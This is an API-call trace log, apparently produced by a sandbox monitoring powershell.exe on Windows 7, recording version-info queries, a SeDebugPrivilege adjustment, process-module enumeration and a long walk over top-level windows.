	[0297.475] GetVersionExW (in: lpVersionInformation=0x26da40*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x26da40*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0297.481] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d660, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0297.485] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d700, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0297.485] GetVersionExW (in: lpVersionInformation=0x26d7b0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x26d7b0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0297.486] SetErrorMode (uMode=0x1) returned 0x1
	[0297.487] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x26d910 | out: lpFileInformation=0x26d910*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0297.488] SetErrorMode (uMode=0x1) returned 0x1
	[0297.491] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x26db80 | out: lpdwHandle=0x26db80) returned 0x94c
	[0297.493] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2d072d8 | out: lpData=0x2d072d8) returned 1
	[0298.213] VerQueryValueW (in: pBlock=0x2d072d8, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x26daf8, puLen=0x26daf0 | out: lplpBuffer=0x26daf8*=0x2d07374, puLen=0x26daf0) returned 1
	[0298.216] lstrlenW (lpString="䅁") returned 1
	[0298.225] VerQueryValueW (in: pBlock=0x2d072d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x26da68, puLen=0x26da60 | out: lplpBuffer=0x26da68*=0x2d07450, puLen=0x26da60) returned 1
	[0298.226] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0298.228] CoTaskMemAlloc (cb=0x2e) returned 0x16a190
	[0298.228] lstrcpyW (in: lpString1=0x16a190, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0298.229] CoTaskMemFree (pv=0x16a190) 
	[0298.230] VerQueryValueW (in: pBlock=0x2d072d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x26da68, puLen=0x26da60 | out: lplpBuffer=0x26da68*=0x2d074a4, puLen=0x26da60) returned 1
	[0298.230] lstrlenW (lpString="System.Management.Automation") returned 28
	[0298.230] CoTaskMemAlloc (cb=0x3c) returned 0xe8ee0
	[0298.230] lstrcpyW (in: lpString1=0xe8ee0, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0298.230] CoTaskMemFree (pv=0xe8ee0) 
	[0298.230] VerQueryValueW (in: pBlock=0x2d072d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x26da68, puLen=0x26da60 | out: lplpBuffer=0x26da68*=0x2d07500, puLen=0x26da60) returned 1
	[0298.230] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0298.230] CoTaskMemAlloc (cb=0x20) returned 0x16a5b0
	[0298.230] lstrcpyW (in: lpString1=0x16a5b0, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0298.230] CoTaskMemFree (pv=0x16a5b0) 
	[0298.230] VerQueryValueW (in: pBlock=0x2d072d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x26da68, puLen=0x26da60 | out: lplpBuffer=0x26da68*=0x2d07540, puLen=0x26da60) returned 1
	[0298.230] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0298.230] CoTaskMemAlloc (cb=0x44) returned 0xe8ee0
	[0298.230] lstrcpyW (in: lpString1=0xe8ee0, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0298.230] CoTaskMemFree (pv=0xe8ee0) 
	[0298.230] VerQueryValueW (in: pBlock=0x2d072d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x26da68, puLen=0x26da60 | out: lplpBuffer=0x26da68*=0x2d075a8, puLen=0x26da60) returned 1
	[0298.230] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0298.230] CoTaskMemAlloc (cb=0x76) returned 0x1191b0
	[0298.230] lstrcpyW (in: lpString1=0x1191b0, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0298.230] CoTaskMemFree (pv=0x1191b0) 
	[0298.230] VerQueryValueW (in: pBlock=0x2d072d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x26da68, puLen=0x26da60 | out: lplpBuffer=0x26da68*=0x2d07644, puLen=0x26da60) returned 1
	[0298.230] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0298.230] CoTaskMemAlloc (cb=0x44) returned 0xe8ee0
	[0298.230] lstrcpyW (in: lpString1=0xe8ee0, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0298.230] CoTaskMemFree (pv=0xe8ee0) 
	[0298.230] VerQueryValueW (in: pBlock=0x2d072d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x26da68, puLen=0x26da60 | out: lplpBuffer=0x26da68*=0x2d076a8, puLen=0x26da60) returned 1
	[0298.230] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0298.230] CoTaskMemAlloc (cb=0x58) returned 0xcb7c0
	[0298.230] lstrcpyW (in: lpString1=0xcb7c0, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0298.231] CoTaskMemFree (pv=0xcb7c0) 
	[0298.231] VerQueryValueW (in: pBlock=0x2d072d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x26da68, puLen=0x26da60 | out: lplpBuffer=0x26da68*=0x2d07724, puLen=0x26da60) returned 1
	[0298.231] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0298.231] CoTaskMemAlloc (cb=0x20) returned 0x16a5b0
	[0298.231] lstrcpyW (in: lpString1=0x16a5b0, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0298.231] CoTaskMemFree (pv=0x16a5b0) 
	[0298.231] VerQueryValueW (in: pBlock=0x2d072d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x26da68, puLen=0x26da60 | out: lplpBuffer=0x26da68*=0x2d073cc, puLen=0x26da60) returned 1
	[0298.231] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0298.231] CoTaskMemAlloc (cb=0x66) returned 0xec2f0
	[0298.231] lstrcpyW (in: lpString1=0xec2f0, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0298.231] CoTaskMemFree (pv=0xec2f0) 
	[0298.231] VerQueryValueW (in: pBlock=0x2d072d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x26da68, puLen=0x26da60 | out: lplpBuffer=0x26da68*=0x0, puLen=0x26da60) returned 0
	[0298.231] VerQueryValueW (in: pBlock=0x2d072d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x26da68, puLen=0x26da60 | out: lplpBuffer=0x26da68*=0x0, puLen=0x26da60) returned 0
	[0298.231] VerQueryValueW (in: pBlock=0x2d072d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x26da68, puLen=0x26da60 | out: lplpBuffer=0x26da68*=0x0, puLen=0x26da60) returned 0
	[0298.231] VerQueryValueW (in: pBlock=0x2d072d8, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x26da38, puLen=0x26da30 | out: lplpBuffer=0x26da38*=0x2d07374, puLen=0x26da30) returned 1
	[0298.232] CoTaskMemAlloc (cb=0x204) returned 0x115520
	[0298.232] VerLanguageNameW (in: wLang=0x0, szLang=0x115520, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0298.233] CoTaskMemFree (pv=0x115520) 
	[0298.234] VerQueryValueW (in: pBlock=0x2d072d8, lpSubBlock="\\", lplpBuffer=0x26da88, puLen=0x26da80 | out: lplpBuffer=0x26da88*=0x2d07300, puLen=0x26da80) returned 1
	[0298.238] GetCurrentProcessId () returned 0x85c
	[0298.245] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0x26c9b0 | out: lpLuid=0x26c9b0*(LowPart=0x14, HighPart=0)) returned 1
	[0299.004] GetCurrentProcess () returned 0xffffffffffffffff
	[0299.010] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x20, TokenHandle=0x26c9d0 | out: TokenHandle=0x26c9d0*=0x2e8) returned 1
	[0299.014] AdjustTokenPrivileges (in: TokenHandle=0x2e8, DisableAllPrivileges=0, NewState=0x2d0ab50*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1
	[0299.019] CloseHandle (hObject=0x2e8) returned 1
	[0299.795] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x85c) returned 0x2e8
	[0299.802] EnumProcessModules (in: hProcess=0x2e8, lphModule=0x2d0abb8, cb=0x200, lpcbNeeded=0x26d9e8 | out: lphModule=0x2d0abb8, lpcbNeeded=0x26d9e8) returned 1
	[0299.805] GetModuleInformation (in: hProcess=0x2e8, hModule=0x13f370000, lpmodinfo=0x2d0ae28, cb=0x18 | out: lpmodinfo=0x2d0ae28*(lpBaseOfDll=0x13f370000, SizeOfImage=0x77000, EntryPoint=0x13f37c63c)) returned 1
	[0299.806] CoTaskMemAlloc (cb=0x804) returned 0x174e80
	[0299.806] GetModuleBaseNameW (in: hProcess=0x2e8, hModule=0x13f370000, lpBaseName=0x174e80, nSize=0x800 | out: lpBaseName="powershell.exe") returned 0xe
	[0299.806] CoTaskMemFree (pv=0x174e80) 
	[0299.807] CoTaskMemAlloc (cb=0x804) returned 0x174e80
	[0299.807] GetModuleFileNameExW (in: hProcess=0x2e8, hModule=0x13f370000, lpFilename=0x174e80, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39
	[0299.807] CoTaskMemFree (pv=0x174e80) 
	[0299.808] CloseHandle (hObject=0x2e8) returned 1
	[0299.814] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x85c) returned 0x2e8
	[0299.815] GetExitCodeProcess (in: hProcess=0x2e8, lpExitCode=0x26db18 | out: lpExitCode=0x26db18*=0x103) returned 1
	[0299.818] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x12d0b088, Length=0x20000, ResultLength=0x26dae0 | out: SystemInformation=0x12d0b088, ResultLength=0x26dae0*=0x15b78) returned 0x0
	[0300.327] EnumWindows (lpEnumFunc=0x29266ac, lParam=0x0) returned 1
	[0300.345] GetWindowThreadProcessId (in: hWnd=0x10090, lpdwProcessId=0x26d840 | out: lpdwProcessId=0x26d840) returned 0x4d0
	[0301.302] GetWindowThreadProcessId (in: hWnd=0x3013e, lpdwProcessId=0x26d840 | out: lpdwProcessId=0x26d840) returned 0x558
	[0301.303] GetWindowThreadProcessId (in: hWnd=0x201ba, lpdwProcessId=0x26d840 | out: lpdwProcessId=0x26d840) returned 0x4d0
	[0302.628] GetWindowThreadProcessId (in: hWnd=0x300fe, lpdwProcessId=0x26d840 | out: lpdwProcessId=0x26d840) returned 0x4d0
	[0302.738] GetWindowThreadProcessId (in: hWnd=0x400ae, lpdwProcessId=0x26d840 | out: lpdwProcessId=0x26d840) returned 0x4d0
	[0302.739] GetWindowThreadProcessId (in: hWnd=0x10146, lpdwProcessId=0x26d840 | out: lpdwProcessId=0x26d840) returned 0x538
	[0303.506] GetWindowThreadProcessId (in: hWnd=0x20118, lpdwProcessId=0x26d840 | out: lpdwProcessId=0x26d840) returned 0x4d0
	[0303.506] GetWindowThreadProcessId (in: hWnd=0x2001e, lpdwProcessId=0x26d840 | out: lpdwProcessId=0x26d840) returned 0x778
	[0303.506] GetWindowThreadProcessId (in: hWnd=0x20028, lpdwProcessId=0x26d840 | out: lpdwProcessId=0x26d840) returned 0x778
	[0303.507] GetWindowThreadProcessId (in: hWnd=0x1007c, lpdwProcessId=0x26d840 | out: lpdwProcessId=0x26d840) returned 0x4d0
	[0303.507] GetWindowThreadProcessId (in: hWnd=0x1007a, lpdwProcessId=0x26d840 | out: lpdwProcessId=0x26d840) returned 0x4d0
	[0303.507] GetWindowThreadProcessId (in: hWnd=0x10066, lpdwProcessId=0x26d840 | out: lpdwProcessId=0x26d840) returned 0x4d0
	[0303.507] GetWindowThreadProcessId (in: hWnd=0x10084, lpdwProcessId=0x26d840 | out: lpdwProcessId=0x26d840) returned 0x4d0
	[0303.507] GetWindowThreadProcessId (in: hWnd=0x10082, lpdwProcessId=0x26d840 | out: lpdwProcessId=0x26d840) returned 0x4d0
	[0303.507] GetWindowThreadProcessId (in: hWnd=0x1007e, lpdwProcessId=0x26d840 | out: lpdwProcessId=0x26d840) returned 0x4d0
	[0303.507] GetWindowThreadProcessId (in: hWnd=0x1005e, lpdwProcessId=0x26d840 | out: lpdwProcessId=0x26d840) returned 0x4d0
	[0303.507] GetWindowThreadProcessId (in: hWnd=0x10056, lpdwProcessId=0x26d840 | out: lpdwProcessId=0x26d840) returned 0x4d0
	[0303.507] GetWindowThreadProcessId (in: hWnd=0x100fa, lpdwProcessId=0x26d840 | out: lpdwProcessId=0x26d840) returned 0x460
	[0303.507] GetWindowThreadProcessId (in: hWnd=0x500a2, lpdwProcessId=0x26d840 | out: lpdwProcessId=0x26d840) returned 0x4d0
	[0303.507] GetWindowThreadProcessId (in: hWnd=0x10092, lpdwProcessId=0x26d840 | out: lpdwProcessId=0x26d840) returned 0x4d0
	[0303.507] GetWindowThreadProcessId (in: hWnd=0x10344, lpdwProcessId=0x26d840 | out: lpdwProcessId=0x26d840) returned 0xc24
	[0303.508] GetWindowThreadProcessId (in: hWnd=0x1032a, lpdwProcessId=0x26d840 | out: lpdwProcessId=0x26d840) returned 0xb84
	[0303.508] GetWindowThreadProcessId (in: hWnd=0x10316, lpdwProcessId=0x26d840 | out: lpdwProcessId=0x26d840) returned 0xbac
	[0303.508] GetWindowThreadProcessId (in: hWnd=0x102f8, lpdwProcessId=0x26d840 | out: lpdwProcessId=0x26d840) returned 0x384
	[0303.508] GetWindowThreadProcessId (in: hWnd=0x102de, lpdwProcessId=0x26d840 | out: lpdwProcessId=0x26d840) returned 0xab8
	[0303.508] GetWindowThreadProcessId (in: hWnd=0x102da, lpdwProcessId=0x26d840 | out: lpdwProcessId=0x26d840) returned 0x33c
	[0303.508] GetWindowThreadProcessId (in: hWnd=0x102d0, lpdwProcessId=0x26d840 | out: lpdwProcessId=0x26d840) returned 0xa44
	[0303.508] GetWindowThreadProcessId (in: hWnd=0x102cc, lpdwProcessId=0x26d840 | out: lpdwProcessId=0x26d840) returned 0xa64
	[0303.508] GetWindowThreadProcessId (in: hWnd=0x102c8, lpdwProcessId=0x26d840 | out: lpdwProcessId=0x26d840) returned 0x8a8
	[0303.508] GetWindowThreadProcessId (in: hWnd=0x102c4, lpdwProcessId=0x26d840 | out: lpdwProcessId=0x26d840) returned 0xaf0
	[0303.508] GetWindowThreadProcessId (in: hWnd=0x102c0, lpdwProcessId=0x26d840 | out: lpdwProcessId=0x26d840) returned 0x88c
	[0303.508] GetWindowThreadProcessId (in: hWnd=0x102bc, lpdwProcessId=0x26d840 | out: lpdwProcessId=0x26d840) returned 0xb04
	[0303.508] GetWindowThreadProcessId (in: hWnd=0x102b0, lpdwProcessId=0x26d840 | out: lpdwProcessId=0x26d840) returned 0x910
	[0303.509] GetWindowThreadProcessId (in: hWnd=0x102ac, lpdwProcessId=0x26d840 | out: lpdwProcessId=0x26d840) returned 0x230
	[0303.509] GetWindowThreadProcessId (in: hWnd=0x30298, lpdwProcessId=0x26d840 | out: lpdwProcessId=0x26d840) returned 0xac0
	[0303.509] GetWindowThreadProcessId (in: hWnd=0x2029a, lpdwProcessId=0x26d840 | out: lpdwProcessId=0x26d840) returned 0xab4
	[0303.509] GetWindowThreadProcessId (in: hWnd=0x10262, lpdwProcessId=0x26d840 | out: lpdwProcessId=0x26d840) returned 0xaac
	[0303.509] GetWindowThreadProcessId (in: hWnd=0x10252, lpdwProcessId=0x26d840 | out: lpdwProcessId=0x26d840) returned 0x3d0
	[0303.509] GetWindowThreadProcessId (in: hWnd=0x10242, lpdwProcessId=0x26d840 | out: lpdwProcessId=0x26d840) returned 0x978
	[0303.510] GetWindow (hWnd=0x10242, uCmd=0x4) returned 0x0
	[0303.510] IsWindowVisible (hWnd=0x10242) returned 0
	[0303.510] GetWindowThreadProcessId (in: hWnd=0x10228, lpdwProcessId=0x26d840 | out: lpdwProcessId=0x26d840) returned 0xa7c
	[0303.510] GetWindowThreadProcessId (in: hWnd=0x10224, lpdwProcessId=0x26d840 | out: lpdwProcessId=0x26d840) returned 0x59c
	[0303.510] GetWindowThreadProcessId (in: hWnd=0x20212, lpdwProcessId=0x26d840 | out: lpdwProcessId=0x26d840) returned 0xa88
	[0303.511] GetWindowThreadProcessId (in: hWnd=0x1021c, lpdwProcessId=0x26d840 | out: lpdwProcessId=0x26d840) returned 0xa6c
	[0303.511] GetWindowThreadProcessId (in: hWnd=0x10214, lpdwProcessId=0x26d840 | out: lpdwProcessId=0x26d840) returned 0xa68
	[0303.511] GetWindowThreadProcessId (in: hWnd=0x20206, lpdwProcessId=0x26d840 | out: lpdwProcessId=0x26d840) returned 0x9f8
	[0303.511] GetWindowThreadProcessId (in: hWnd=0x20204, lpdwProcessId=0x26d840 | out: lpdwProcessId=0x26d840) returned 0xa04
	[0303.511] GetWindowThreadProcessId (in: hWnd=0x1020a, lpdwProcessId=0x26d840 | out: lpdwProcessId=0x26d840) returned 0x924
	[0303.511] GetWindowThreadProcessId (in: hWnd=0x10200, lpdwProcessId=0x26d840 | out: lpdwProcessId=0x26d840) returned 0x8dc
	[0303.511] GetWindowThreadProcessId (in: hWnd=0x201ec, lpdwProcessId=0x26d840 | out: lpdwProcessId=0x26d840) returned 0x7dc
	[0303.511] GetWindowThreadProcessId (in: hWnd=0x301d6, lpdwProcessId=0x26d840 | out: lpdwProcessId=0x26d840) returned 0x768
	[0303.511] GetWindowThreadProcessId (in: hWnd=0x301e0, lpdwProcessId=0x26d840 | out: lpdwProcessId=0x26d840) returned 0x764
	[0303.511] GetWindowThreadProcessId (in: hWnd=0x201e4, lpdwProcessId=0x26d840 | out: lpdwProcessId=0x26d840) returned 0x820
	[0303.511] GetWindowThreadProcessId (in: hWnd=0x201c6, lpdwProcessId=0x26d840 | out: lpdwProcessId=0x26d840) returned 0x810
	[0303.511] GetWindowThreadProcessId (in: hWnd=0x301f2, lpdwProcessId=0x26d840 | out: lpdwProcessId=0x26d840) returned 0x794
	[0303.511] GetWindowThreadProcessId (in: hWnd=0x401b6, lpdwProcessId=0x26d840 | out: lpdwProcessId=0x26d840) returned 0x83c
	[0303.512] GetWindowThreadProcessId (in: hWnd=0x501be, lpdwProcessId=0x26d840 | out: lpdwProcessId=0x26d840) returned 0x7ac
	[0303.512] GetWindowThreadProcessId (in: hWnd=0x160162, lpdwProcessId=0x26d840 | out: lpdwProcessId=0x26d840) returned 0xb44
	[0303.512] GetWindowThreadProcessId (in: hWnd=0x500ea, lpdwProcessId=0x26d840 | out: lpdwProcessId=0x26d840) returned 0xb5c
	[0303.512] GetWindowThreadProcessId (in: hWnd=0x101b0, lpdwProcessId=0x26d840 | out: lpdwProcessId=0x26d840) returned 0x838
	[0303.512] GetWindowThreadProcessId (in: hWnd=0x800a8, lpdwProcessId=0x26d840 | out: lpdwProcessId=0x26d840) returned 0x4d0
	[0303.512] GetWindowThreadProcessId (in: hWnd=0x400b0, lpdwProcessId=0x26d840 | out: lpdwProcessId=0x26d840) returned 0x4d0
	[0303.512] GetWindowThreadProcessId (in: hWnd=0x300c6, lpdwProcessId=0x26d840 | out: lpdwProcessId=0x26d840) returned 0x4d0
	[0303.512] GetWindowThreadProcessId (in: hWnd=0x300d2, lpdwProcessId=0x26d840 | out: lpdwProcessId=0x26d840) returned 0x4d0
	[0303.512] GetWindowThreadProcessId (in: hWnd=0x300ce, lpdwProcessId=0x26d840 | out: lpdwProcessId=0x26d840) returned 0x4d0
	[0303.512] GetWindowThreadProcessId (in: hWnd=0x300d8, lpdwProcessId=0x26d840 | out: lpdwProcessId=0x26d840) returned 0x4d0
	[0303.512] GetWindowThreadProcessId (in: hWnd=0x400b8, lpdwProcessId=0x26d840 | out: lpdwProcessId=0x26d840) returned 0x4d0
	[0303.512] GetWindowThreadProcessId (in: hWnd=0x300ac, lpdwProcessId=0x26d840 | out: lpdwProcessId=0x26d840) returned 0x4d0
	[0303.513] GetWindowThreadProcessId (in: hWnd=0x101ac, lpdwProcessId=0x26d840 | out: lpdwProcessId=0x26d840) returned 0x818
	[0303.513] GetWindowThreadProcessId (in: hWnd=0x101a8, lpdwProcessId=0x26d840 | out: lpdwProcessId=0x26d840) returned 0x5b8
	[0303.513] GetWindowThreadProcessId (in: hWnd=0x101a4, lpdwProcessId=0x26d840 | out: lpdwProcessId=0x26d840) returned 0x494
	[0303.513] GetWindowThreadProcessId (in: hWnd=0x101a0, lpdwProcessId=0x26d840 | out: lpdwProcessId=0x26d840) returned 0x1ec
	[0303.513] GetWindowThreadProcessId (in: hWnd=0x1019c, lpdwProcessId=0x26d840 | out: lpdwProcessId=0x26d840) returned 0x440
	[0303.513] GetWindowThreadProcessId (in: hWnd=0x10198, lpdwProcessId=0x26d840 | out: lpdwProcessId=0x26d840) returned 0x7e8
	[0303.513] GetWindowThreadProcessId (in: hWnd=0x10194, lpdwProcessId=0x26d840 | out: lpdwProcessId=0x26d840) returned 0x730
	[0303.513] GetWindowThreadProcessId (in: hWnd=0x10190, lpdwProcessId=0x26d840 | out: lpdwProcessId=0x26d840) returned 0x2c8
	[0303.513] GetWindowThreadProcessId (in: hWnd=0x1018c, lpdwProcessId=0x26d840 | out: lpdwProcessId=0x26d840) returned 0x31c
	[0303.513] GetWindowThreadProcessId (in: hWnd=0x10188, lpdwProcessId=0x26d840 | out: lpdwProcessId=0x26d840) returned 0x330
	[0303.513] GetWindowThreadProcessId (in: hWnd=0x10184, lpdwProcessId=0x26d840 | out: lpdwProcessId=0x26d840) returned 0x128
	[0303.513] GetWindowThreadProcessId (in: hWnd=0x10180, lpdwProcessId=0x26d840 | out: lpdwProcessId=0x26d840) returned 0x5c8
	[0303.513] GetWindowThreadProcessId (in: hWnd=0x1017c, lpdwProcessId=0x26d840 | out: lpdwProcessId=0x26d840) returned 0x6f8
	[0303.514] GetWindowThreadProcessId (in: hWnd=0x10178, lpdwProcessId=0x26d840 | out: lpdwProcessId=0x26d840) returned 0x358
	[0303.514] GetWindowThreadProcessId (in: hWnd=0x10174, lpdwProcessId=0x26d840 | out: lpdwProcessId=0x26d840) returned 0x73c
	[0303.514] GetWindowThreadProcessId (in: hWnd=0x10170, lpdwProcessId=0x26d840 | out: lpdwProcessId=0x26d840) returned 0xb0
	[0303.514] GetWindowThreadProcessId (in: hWnd=0x1016c, lpdwProcessId=0x26d840 | out: lpdwProcessId=0x26d840) returned 0x250
	[0303.514] GetWindowThreadProcessId (in: hWnd=0x10168, lpdwProcessId=0x26d840 | out: lpdwProcessId=0x26d840) returned 0x240
	[0303.514] GetWindowThreadProcessId (in: hWnd=0x2015e, lpdwProcessId=0x26d840 | out: lpdwProcessId=0x26d840) returned 0x790
	[0303.514] GetWindowThreadProcessId (in: hWnd=0x40112, lpdwProcessId=0x26d840 | out: lpdwProcessId=0x26d840) returned 0x61c
	[0303.514] GetWindowThreadProcessId (in: hWnd=0x3015a, lpdwProcessId=0x26d840 | out: lpdwProcessId=0x26d840) returned 0x540
	[0303.514] GetWindowThreadProcessId (in: hWnd=0x10150, lpdwProcessId=0x26d840 | out: lpdwProcessId=0x26d840) returned 0x538
	[0303.514] GetWindowThreadProcessId (in: hWnd=0x1014e, lpdwProcessId=0x26d840 | out: lpdwProcessId=0x26d840) returned 0x568
	[0303.514] GetWindowThreadProcessId (in: hWnd=0x20144, lpdwProcessId=0x26d840 | out: lpdwProcessId=0x26d840) returned 0x538
	[0303.514] GetWindowThreadProcessId (in: hWnd=0x10138, lpdwProcessId=0x26d840 | out: lpdwProcessId=0x26d840) returned 0x568
	[0303.514] GetWindowThreadProcessId (in: hWnd=0x10130, lpdwProcessId=0x26d840 | out: lpdwProcessId=0x26d840) returned 0x538
	[0303.515] GetWindowThreadProcessId (in: hWnd=0x10126, lpdwProcessId=0x26d840 | out: lpdwProcessId=0x26d840) returned 0x540
	[0303.515] GetWindowThreadProcessId (in: hWnd=0x200d6, lpdwProcessId=0x26d840 | out: lpdwProcessId=0x26d840) returned 0x540
	[0303.515] GetWindowThreadProcessId (in: hWnd=0x1010e, lpdwProcessId=0x26d840 | out: lpdwProcessId=0x26d840) returned 0x510
	[0303.515] GetWindowThreadProcessId (in: hWnd=0x1010c, lpdwProcessId=0x26d840 | out: lpdwProcessId=0x26d840) returned 0x57c
	[0303.515] GetWindowThreadProcessId (in: hWnd=0x10108, lpdwProcessId=0x26d840 | out: lpdwProcessId=0x26d840) returned 0x460
	[0303.515] GetWindowThreadProcessId (in: hWnd=0x10102, lpdwProcessId=0x26d840 | out: lpdwProcessId=0x26d840) returned 0x554
	[0303.515] GetWindowThreadProcessId (in: hWnd=0x50094, lpdwProcessId=0x26d840 | out: lpdwProcessId=0x26d840) returned 0x4d0
	[0303.515] GetWindowThreadProcessId (in: hWnd=0x1008a, lpdwProcessId=0x26d840 | out: lpdwProcessId=0x26d840) returned 0x528
	[0303.515] GetWindowThreadProcessId (in: hWnd=0x10088, lpdwProcessId=0x26d840 | out: lpdwProcessId=0x26d840) returned 0x4d0
	[0303.515] GetWindowThreadProcessId (in: hWnd=0x10080, lpdwProcessId=0x26d840 | out: lpdwProcessId=0x26d840) returned 0x4d0
	[0303.515] GetWindowThreadProcessId (in: hWnd=0x1006e, lpdwProcessId=0x26d840 | out: lpdwProcessId=0x26d840) returned 0x4d0
	[0303.515] GetWindowThreadProcessId (in: hWnd=0x20020, lpdwProcessId=0x26d840 | out: lpdwProcessId=0x26d840) returned 0x79c
	[0303.515] GetWindowThreadProcessId (in: hWnd=0x1006a, lpdwProcessId=0x26d840 | out: lpdwProcessId=0x26d840) returned 0x4d0
	[0303.516] GetWindowThreadProcessId (in: hWnd=0x10058, lpdwProcessId=0x26d840 | out: lpdwProcessId=0x26d840) returned 0x4e0
	[0303.516] GetWindowThreadProcessId (in: hWnd=0x10052, lpdwProcessId=0x26d840 | out: lpdwProcessId=0x26d840) returned 0x4d0
